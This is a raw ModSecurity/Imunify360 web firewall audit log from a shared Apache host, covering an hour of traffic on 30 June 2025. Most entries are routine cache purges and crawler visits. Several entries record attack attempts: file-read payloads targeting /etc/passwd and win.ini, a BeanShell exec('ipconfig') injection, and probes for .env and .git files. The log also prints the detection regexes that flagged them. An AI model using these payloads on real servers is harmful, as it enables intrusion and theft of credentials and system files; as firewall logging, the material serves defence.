ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --40604a68-Z-- --328bec3f-A-- [30/Jun/2025:09:14:06.925924 +0530] aGIIBSbPFSbCXNukAJI9KQAAAA0 103.185.74.40 12439 192.168.74.40 443 --328bec3f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --328bec3f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --328bec3f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255045571089 1355147 (- - -) Stopwatch2: 1751255045571089 1355147; combined=2179, p1=102, p2=1869, p3=0, p4=0, p5=207, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --328bec3f-Z-- --ca67db7c-A-- [30/Jun/2025:09:14:19.569099 +0530] aGIIEYZe6BrErBtdaID6pgAAAA4 66.249.65.192 48220 192.168.74.40 443 --ca67db7c-B-- GET /pcmypage?callback=/product%2Fdetail%2jp-auction-n1146891013 HTTP/1.1 Host: hypertechindia.com AMP-Cache-Transform: google;v="1..8" Connection: keep-alive Accept: text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8 From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --ca67db7c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --905fe332-Z-- --0baa815f-A-- [30/Jun/2025:09:31:12.864788 +0530] aGIMCJTOg5MfBu0aUg_c_AAAADQ 42.200.231.141 42836 192.168.74.40 443 --0baa815f-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Connection: close Content-Length: 42 Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --0baa815f-C-- var={"body":{"file":"file:///etc/passwd"}} --0baa815f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --0baa815f-H-- Message: Matched phrase "etc/passwd" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "133"] [id "77350504"] [msg "IM360 WAF: Block System File Attempt||MV:{\"body\":{\"file\":\"file:/etc/passwd\"}}||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751256072798301 67115 (- - -) Stopwatch2: 1751256072798301 67115; combined=9932, p1=99, p2=9428, p3=0, p4=0, p5=405, sr=44, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0baa815f-Z-- --4ceb8755-A-- [30/Jun/2025:09:31:13.883290 +0530] aGIMCYECgiNvMI54GiFKfgAAADY 42.200.231.141 42848 192.168.74.40 443 --4ceb8755-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/114.0 Safari/537.36 Connection: close Content-Length: 51 Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --4ceb8755-C-- var={"body":{"file":"file:///c://windows/win.ini"}} --4ceb8755-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4ceb8755-H-- Message: Matched phrase "/windows/win.ini" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "133"] [id "77350504"] [msg "IM360 WAF: Block System File Attempt||MV:{\"body\":{\"file\":\"file:/c:/windows/win.ini\"}}||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751256073822177 61652 (- - -) Stopwatch2: 1751256073822177 61652; combined=10403, p1=253, p2=9882, p3=0, p4=0, p5=267, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4ceb8755-Z-- --66643e08-A-- [30/Jun/2025:09:31:15.232130 +0530] aGIMC45tNbv-LxmFmes0qQAAADI 20.171.207.232 50728 192.168.74.40 443 --66643e08-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --66643e08-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --66643e08-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d2a0dd75-Z-- --6d550f6b-A-- [30/Jun/2025:09:39:05.118467 +0530] aGIN4dvXAFtPKE3DkVonQAAAAAc 157.245.2.32 49906 192.168.74.40 80 --6d550f6b-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --6d550f6b-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --6d550f6b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751256545113625 5115 (- - -) Stopwatch2: 1751256545113625 5115; combined=1420, p1=111, p2=744, p3=0, p4=0, p5=564, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6d550f6b-Z-- --b677e61c-A-- [30/Jun/2025:09:39:05.603143 +0530] aGIN4XA6NpcWHkSi5ycXRQAAAAk 157.245.2.32 49910 192.168.74.40 80 --b677e61c-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --b677e61c-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --b677e61c-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: default-handler Stopwatch: 1751256545595501 9093 (- - -) Stopwatch2: 1751256545595501 9093; combined=3859, p1=129, p2=3589, p3=0, p4=0, p5=141, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b677e61c-Z-- --f381cd3a-A-- [30/Jun/2025:09:39:05.713836 +0530] aGIN4ZY3BQQPzTEhox5ZFQAAABk 20.171.207.232 36034 192.168.74.40 443 --f381cd3a-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/aainag/js/hotels-jaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f381cd3a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f381cd3a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/aainag/js/hotels-jaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/aainag/js/hotels-jaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751256545699253 14723 (- - -) Stopwatch2: 1751256545699253 14723; combined=2880, p1=150, p2=2556, p3=0, p4=0, p5=173, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257652782816 15791 (- - -) Stopwatch2: 1751257652782816 15791; combined=3399, p1=155, p2=3077, p3=0, p4=0, p5=166, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --82e7471c-Z-- --8046006b-A-- [30/Jun/2025:09:57:40.039299 +0530] aGISOMfK7p-SoJnlbY18qAAAAD4 103.185.74.40 59716 192.168.74.40 443 --8046006b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --8046006b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8046006b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257656627260 3412638 (- - -) Stopwatch2: 1751257656627260 3412638; combined=2793, p1=102, p2=2489, p3=0, p4=0, p5=202, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8046006b-Z-- --c8676b72-A-- [30/Jun/2025:09:57:41.267096 +0530] aGISPH1xkoRk4yPmuPgWJgAAAAk 103.185.74.40 30968 192.168.74.40 443 --c8676b72-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --c8676b72-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c8676b72-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257660250282 1017449 (- - -) Stopwatch2: 1751257660250282 1017449; combined=2245, p1=84, p2=1871, p3=0, p4=0, p5=290, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c8676b72-Z-- --a3e44125-A-- [30/Jun/2025:09:57:47.486614 +0530] aGISQye-Wd2kx1Cpb27HxQAAACM 152.59.61.103 39880 192.168.74.40 443 --a3e44125-B-- GET /js/masterslider/style/style.php?id=g4enhnz4xh5oteh3lzzkt HTTP/1.1 Host: sbagritech.com Connection: keep-alive sec-ch-ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116" sec-ch-ua-mobile: ?1 User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36 sec-ch-ua-platform: "Android" Accept: */* Sec-Fetch-Site: same-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --22b45e1c-Z-- --3582b244-A-- [30/Jun/2025:10:00:20.024169 +0530] aGIS26UriY3cDinrmcZKKwAAACA 45.95.242.45 49196 192.168.74.40 443 --3582b244-B-- POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 Connection: close Content-Length: 28 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --3582b244-C-- bsh.script=exec("ipconfig"); --3582b244-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3582b244-H-- Message: Pattern match "(?i)\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:bsh.script. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "53"] [id "77134464"] [msg "IM360 WAF: Infectors: PHP Injection High-Risk PHP Function||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/servlet||"] [severity "DEBUG"] [tag "service_im360"] Message: Pattern match "(?:print|echo|eval|exec)\\(" at ARGS:bsh.script. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "91"] [id "77140881"] [msg "IM360 WAF: Infectors: Arbitrary code execution vulnerability in Request URI||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/servlet||"] [severity "DEBUG"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751257819450218 574553 (- - -) Stopwatch2: 1751257819450218 574553; combined=12138, p1=177, p2=11507, p3=0, p4=0, p5=453, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3582b244-Z-- --4f76852d-A-- [30/Jun/2025:10:00:21.021578 +0530] aGIS2bjSWQmDwo1nsoZ8XQAAADQ 66.249.65.99 44331 192.168.74.40 443 --4f76852d-B-- POST /wp-admin/admin-ajax.php HTTP/1.1 Accept-Language: en-US Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://miribooks.com Referer: https://miribooks.com/ X-Requested-With: XMLHttpRequest Host: miribooks.com Content-Length: 42 Connection: keep-alive Accept: text/html,*/*; q=0.01 From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.68 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --4f76852d-C-- action=fusion_form_update_view&form_id=767 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258424715779 15963 (- - -) Stopwatch2: 1751258424715779 15963; combined=3854, p1=156, p2=3562, p3=0, p4=0, p5=135, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1bd2c25e-Z-- --a2e9603c-A-- [30/Jun/2025:10:10:34.091049 +0530] aGIVQa93DG-_wCJ5q2B93AAAAAE 103.185.74.40 38930 192.168.74.40 443 --a2e9603c-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --a2e9603c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a2e9603c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258433014706 1076857 (- - -) Stopwatch2: 1751258433014706 1076857; combined=2238, p1=86, p2=2005, p3=0, p4=0, p5=147, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a2e9603c-Z-- --f7fe6035-A-- [30/Jun/2025:10:10:36.004209 +0530] aGIVQgIHzUcQ0in2Eaf3bAAAACo 103.185.74.40 23898 192.168.74.40 443 --f7fe6035-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f7fe6035-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f7fe6035-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258434310189 1694499 (- - -) Stopwatch2: 1751258434310189 1694499; combined=3104, p1=116, p2=2778, p3=0, p4=0, p5=209, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f7fe6035-Z-- --511c1e0a-A-- [30/Jun/2025:10:10:38.536042 +0530] aGIVRjdfMoxrd6oJm5jicgAAAEU 43.156.202.34 47402 192.168.74.40 80 --511c1e0a-B-- GET / HTTP/1.1 Host: fastcrowwholesale.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258658807100 17929 (- - -) Stopwatch2: 1751258658807100 17929; combined=4227, p1=168, p2=3823, p3=0, p4=0, p5=236, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d1722718-Z-- --66aa5b3e-A-- [30/Jun/2025:10:14:22.268951 +0530] aGIWJRzeZOcGeFSOIv5wLwAAACk 103.185.74.40 8765 192.168.74.40 443 --66aa5b3e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --66aa5b3e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --66aa5b3e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258661023999 1245383 (- - -) Stopwatch2: 1751258661023999 1245383; combined=2546, p1=91, p2=2316, p3=0, p4=0, p5=139, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --66aa5b3e-Z-- --1aa6c879-A-- [30/Jun/2025:10:14:22.593120 +0530] aGIWJhB7BDBKyxEB5DxhmAAAAB0 20.171.207.232 52634 192.168.74.40 443 --1aa6c879-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/aainag/https/images/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1aa6c879-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1aa6c879-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258662578622 14755 (- - -) Stopwatch2: 1751258662578622 14755; combined=3282, p1=106, p2=3014, p3=0, p4=0, p5=161, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1aa6c879-Z-- --2c89be22-A-- [30/Jun/2025:10:14:23.955146 +0530] aGIWJm57Rpc9jlvvQFfWiAAAAAk 103.185.74.40 29334 192.168.74.40 443 --2c89be22-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: 